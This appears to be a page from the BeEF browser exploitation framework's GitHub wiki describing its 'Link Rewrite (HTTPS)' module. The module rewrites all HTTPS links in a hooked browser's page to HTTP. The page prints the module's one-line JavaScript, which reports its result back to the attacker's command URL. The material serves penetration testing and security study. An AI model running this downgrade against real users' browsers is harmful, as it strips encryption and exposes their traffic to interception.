Skip to content

Module: Link Rewrite (HTTPS)

Haoxi Tan edited this page Jan 8, 2020 · 2 revisions

Summary

  • Objective: Replace all HTTPS links to HTTP

  • Authors: bcoles

  • Browsers: All

  • Code

Internal Working

replace the protocol portion of all links from HTTPS to HTTP.

beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+beef.dom.rewriteLinksProtocol(old_protocol, new_protocol, selector)+' '+old_protocol+' links rewritten to '+new_protocol);

Feedback

Clone this wiki locally